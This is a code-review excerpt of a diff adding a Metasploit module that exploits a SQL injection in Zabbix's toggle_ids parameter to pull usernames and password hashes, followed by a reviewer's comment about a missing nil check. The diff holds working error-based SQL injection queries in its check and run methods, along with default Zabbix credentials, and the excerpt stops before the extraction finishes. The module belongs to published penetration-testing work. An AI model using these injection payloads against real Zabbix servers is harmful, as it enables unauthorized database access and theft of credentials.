modules/auxiliary/gather/zabbix_toggleids_sqli.rb

```diff
@@ -0,0 +1,237 @@
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Zabbix toggle_ids SQL Injection',
+      'Description'    => %q{
+      This module will exploit a SQL injection in Zabbix 3.0.3 and
+      likely prior in order to save the current usernames and
+      password hashes from the database to a JSON file.
+      },
+      'References'     =>
+        [
+          ['URL', 'http://seclists.org/fulldisclosure/2016/Aug/60']
+        ],
+      'Author'         =>
+        [
+          '1n3@hushmail.com', #discovery
+          'bperry' #module
+        ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => 'Aug 11 2016'
+    ))
+
+    register_options(
+      [
+        OptBool.new('REQUIREAUTH', [true, 'Enforce authentication', false]),
+        OptString.new('USERNAME', [false, 'The username to authenticate with', 'Admin']),
+        OptString.new('PASSWORD', [false, 'The password to authenticate with', 'zabbix']),
+        OptString.new('TARGETURI', [true, 'The relative URI for Zabbix', '/zabbix'])
+      ], self.class)
+  end
+
+  def check
+
+    sid, cookies = authenticate
+
+    left_marker = Rex::Text.rand_text_alpha(5)
+    right_marker = Rex::Text.rand_text_alpha(5)
+    flag = Rex::Text.rand_text_alpha(5)
+
+    query = "AND (SELECT 1256 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
+    query << ",(SELECT MID((IFNULL(CAST(0x#{flag.unpack("H*")[0]} AS CHAR),0x20)),1,54)"
+    query << " FROM dual LIMIT 0,1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM"
+    query << ' INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'
+
+    res = make_injected_request(query, sid, cookies)
+
+    unless res and res.body
+      return Msf::Exploit::CheckCode::Safe
+    end
+
+    match = /#{left_marker}(.*)#{right_marker}/.match(res.body)
+
+    if match[1] == flag
+      return Msf::Exploit::CheckCode::Vulnerable
+    end
+
+    Msf::Exploit::CheckCode::Safe
+  end
+
+  def run
+    sid, cookies = authenticate
+
+    left_marker = Rex::Text.rand_text_alpha(5)
+    right_marker = Rex::Text.rand_text_alpha(5)
+
+    query = " AND (SELECT 5361 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
+    query << ",(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM"
+    query << " INFORMATION_SCHEMA.SCHEMATA),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x"
+    query << " FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
+
+    res = make_injected_request(query, sid, cookies)
+
+    unless res and res.body
+      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
+    end
+
+    match = /#{left_marker}(.*)#{right_marker}/.match(res.body)
+
+    count = match[1].to_i
```

Comment:
@brandonprry, I see that the code checks `res` before parsing out the interesting data into `match`, but I do not see any check of `match` before indexing it.  If the query returns a value without the expected data tags, `match` will be `nil` and the module will crash when it tries to perform `match[1]`.  (FYI, the same thing will happen in the `check` module.)  A quick check and printed warning in both places with a graceful exit might help alleviate confusion if the target is not responding as expected.